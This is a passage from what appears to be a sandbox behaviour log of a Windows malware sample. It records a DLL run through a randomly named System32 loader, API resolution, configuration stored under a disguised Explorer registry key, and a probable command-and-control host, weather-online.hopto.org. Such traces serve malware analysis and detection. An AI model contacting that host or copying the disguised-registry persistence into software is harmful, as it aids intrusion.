(hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.963] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.963] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.963] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.963] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.964] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.965] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.965] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.965] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.965] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.965] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.965] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.965] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.965] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.966] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.966] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.966] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.966] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.966] AddAtomT () returned 0x0 [0034.966] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x16f614, lpdwDisposition=0x16f618 | out: phkResult=0x16f614*=0x78, lpdwDisposition=0x16f618*=0x2) returned 0x0 [0034.966] CloseHandle (hObject=0x78) returned 1 [0034.966] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0034.966] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x16f660, lpdwDisposition=0x16f718 | out: phkResult=0x16f660*=0x7c, lpdwDisposition=0x16f718*=0x2) returned 0x0 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1ed94, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1ed98, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1ed9c, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eda4, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eda8, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edb8, lpcbData=0x16f65c*=0x8 | out: lpType=0x16f664*=0x3, lpData=0x72f1edb8*, lpcbData=0x16f65c*=0x8) returned 0x0 [0034.966] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edc0, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x16f65c*=0x4) returned 0x0 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edc4, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edc8, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x16f65c*=0x4) returned 0x0 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edcc, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x16f65c*=0x4) returned 0x0 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edd0, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x16f65c*=0x4) returned 0x0 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eddc, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x16f664, lpData=0x300b28, lpcbData=0x16f65c*=0x200 | out: lpType=0x16f664*=0x0, lpData=0x300b28*=0x0, lpcbData=0x16f65c*=0x200) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eef0, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x16f664, lpData=0x300d30, lpcbData=0x16f65c*=0x64 | out: lpType=0x16f664*=0x3, lpData=0x300d30*, lpcbData=0x16f65c*=0x2) returned 0x0 [0034.967] lstrlenA (lpString=" ") returned 1 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1edec, lpcbData=0x16f65c*=0x104 | out: lpType=0x16f664*=0x3, lpData=0x72f1edec*, lpcbData=0x16f65c*=0x0) returned 0x0 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eef4, lpcbData=0x16f65c*=0x8 | out: lpType=0x16f664*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x16f65c*=0x8) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eefc, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1ef00, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.967] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x16f664, lpData=0x72f1eda0, lpcbData=0x16f65c*=0x4 | out: lpType=0x16f664*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x16f65c*=0x4) returned 0x2 [0034.967] RegCloseKey (hKey=0x7c) returned 0x0 [0034.967] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16f720 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16f720*=0x2) returned 0x0 [0034.967] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0034.967] GetLastError () returned 0x0 [0034.967] RegCloseKey (hKey=0x7c) returned 0x0 [0034.967] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16f730 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16f730*=0x2) returned 0x0 [0034.967] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0034.968] RegCloseKey (hKey=0x7c) returned 0x0 [0034.968] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16f720 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16f720*=0x2) returned 0x0 [0034.968] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0034.968] RegCloseKey (hKey=0x7c) returned 0x0 [0034.968] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16f71c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16f71c*=0x2) returned 0x0 [0034.968] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0034.968] RegCloseKey (hKey=0x7c) returned 0x0 [0034.968] GetLastError () returned 0x0 [0034.968] GetLastError () returned 0x0 [0034.968] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0034.968] lstrlenA (lpString="00") returned 2 [0034.968] lstrlenA (lpString="/00/") returned 4 [0034.968] wsprintfA (in: param_1=0x300da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0034.968] wsprintfA (in: param_1=0x300dc8, param_2="%s" | out: param_1="00") returned 2 [0034.968] wsprintfA (in: param_1=0x3026e8, param_2="%s" | out: param_1="/00/") returned 4 [0034.968] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0034.968] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0034.968] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x16f71c | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x16f71c*=0x2) returned 0x0 [0034.968] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x300d30*, cbData=0x64 | out: lpData=0x300d30*) returned 0x0 [0034.968] RegCloseKey (hKey=0x7c) returned 0x0 [0034.970] HeapDestroy (hHeap=0x300000) returned 1 Process: id = "52" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fb80" os_pid = "0xcec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"explorer.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2298 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2299 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2300 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 2301 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 2302 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 2303 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2304 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2305 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 2306 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 2307 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 2308 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2309 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2310 start_va = 0x250000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 2311 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 2312 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2313 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2314 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 2315 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 2316 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 2317 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 2318 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2319 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2320 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2321 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2322 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2323 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 2324 start_va = 0x3e0000 end_va = 0x4a7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 2325 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 2326 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 2327 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2328 start_va = 0x1c0000 end_va = 0x1c0fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2329 start_va = 0x4b0000 end_va = 0x5b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004b0000" filename = "" Region: id = 2330 start_va = 0x5c0000 end_va = 0x11bffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005c0000" filename = "" Region: id = 2331 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2332 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2333 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2334 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2335 start_va = 0x1200000 end_va = 0x132ffff entry_point = 0x0 region_type = private name = "private_0x0000000001200000" filename = "" Region: id = 2336 start_va = 0x77510000 end_va = 0x77544fff entry_point = 0x77510000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 2337 start_va = 0x762d0000 end_va = 0x762d5fff entry_point = 0x762d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 2338 start_va = 0x1330000 end_va = 0x14fffff entry_point = 0x0 region_type = private name = "private_0x0000000001330000" filename = "" Thread: id = 110 os_tid = 0xcf0 [0035.005] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12fafc | out: lpSystemTimeAsFileTime=0x12fafc*(dwLowDateTime=0xe28bb490, dwHighDateTime=0x1d3dfba)) [0035.005] GetCurrentProcessId () returned 0xcec [0035.005] GetCurrentThreadId () returned 0xcf0 [0035.005] GetTickCount () returned 0x17e05 [0035.005] QueryPerformanceCounter (in: lpPerformanceCount=0x12faf4 | out: lpPerformanceCount=0x12faf4*=372840949) returned 1 [0035.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsAlloc") returned 0x7622418d [0035.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsGetValue") returned 0x76221e16 [0035.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsSetValue") returned 0x762276e6 [0035.006] GetProcAddress (hModule=0x761d0000, lpProcName="FlsFree") returned 0x76221f61 [0035.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.006] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.006] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.007] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.007] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.008] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.008] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.008] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x761d0000 [0035.008] GetProcAddress (hModule=0x761d0000, lpProcName="EncodePointer") returned 0x77f1a295 [0035.008] GetProcAddress (hModule=0x761d0000, lpProcName="DecodePointer") returned 0x77f1cd10 [0035.008] GetCurrentThreadId () returned 0xcf0 [0035.008] GetCommandLineA () returned="\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"explorer.exe\"" [0035.008] GetEnvironmentStringsW () returned 0x2f79b8* [0035.008] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, 